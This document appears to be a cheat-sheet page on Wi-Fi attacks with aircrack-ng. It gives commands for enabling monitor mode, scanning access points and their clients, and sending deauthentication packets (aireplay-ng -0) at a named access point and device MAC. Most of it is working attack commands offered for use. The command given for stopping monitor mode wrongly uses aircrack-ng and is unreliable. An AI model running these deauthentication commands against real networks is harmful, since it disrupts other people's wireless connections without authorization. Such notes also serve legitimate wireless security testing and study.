Aircrack-ng

Monitor Mode

# Stop processes that could cause issues
sudo airmon-ng check kill

# Put wlan0 into monitor mode
sudo airmon-ng start wlan0 

# Check that wlan0 is monitoring 
sudo iwconfig 

# Check Injection is working 
sudo aireplay-ng -9 wlan0

Stop Monitor Mode

sudo aircrack-ng stop wlan0

Scan for Access Points

sudo airodump-ng wlan0

Scan for devices on Access Points

airodump-ng -d "target's BSSID" -c "target's channel number" "wireless adapter monitor mode name"

sudo airodump-ng -d 50:C7:BF:DC:4C:E8 -c 11 wlan0

Deauthenticate devices on Access Points

This will only work if wlan0 is set to the same channel as the target AP. The above scans will tell you the channel.

The below will change wlan0 to channel 11.

sudo iwconfig wlan0 channel 11

Command

Function

Aireplay-ng

Tool

-0 10

Send 10 deauth packets (0 to keep deauthing)

-a [AP MAC]

Specify the AP to target

-c [Device MAC]

Specify the device on the AP to target (none specified will do all)

wlan0

Specify the interface to use

aireplay-ng -0 10 -a 50:C7:BF:DC:4C:E8 -c E0:B5:2D:EA:18:A7 wlan0

Last updated